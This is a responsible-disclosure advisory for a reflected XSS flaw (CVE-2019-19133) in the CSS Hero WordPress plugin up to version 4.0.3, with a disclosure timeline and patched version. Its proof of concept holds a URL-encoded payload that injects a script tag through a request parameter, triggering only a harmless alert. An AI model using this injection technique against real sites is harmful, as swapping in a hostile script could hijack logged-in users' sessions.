Document Title
===============
CVE-2019-19133
Reflected XSS in CSS Hero (<= v.4.0.3) WordPress plugin.
Product Description
===============
CSS Hero WordPress Plugin
A live WordPress Theme editor that works without modifying any
of your
theme files. Very low performance footprint: only generates and
adds a
single static CSS file to your site.
Homepage: https://www.csshero.org/
CSS Hero is vulnerable to a reflected XSS attack (authenticated).
PoC
===============
Steps:
1) Authenticate to the WordPress application with the CSS Hero plugin installed.
2) Navigate to the following vulnerable link:
hxxp://
vulnerable.wordpress.com/?csshero_action=edit_page&rand=1015&foo%22%3E%3C/iframe%3E%3Cscript%3Ealert(%27Reflected%20XSS%20in%20CSS%20Hero%204.0.3%27)%3C/script%3E%3Ciframe%3Ebar
3) JavaScript executes within the context of the browser.
The
arbitrary parameter and value are reflected into the returned
HTML.
Responsible Disclosure Information
===============
Vendor Contacted: 11/17
Date Patched: 11/20
Patched Version: v.4.0.7
Public Disclosure: 12/2
Cary Hooper
@nopantrootdance
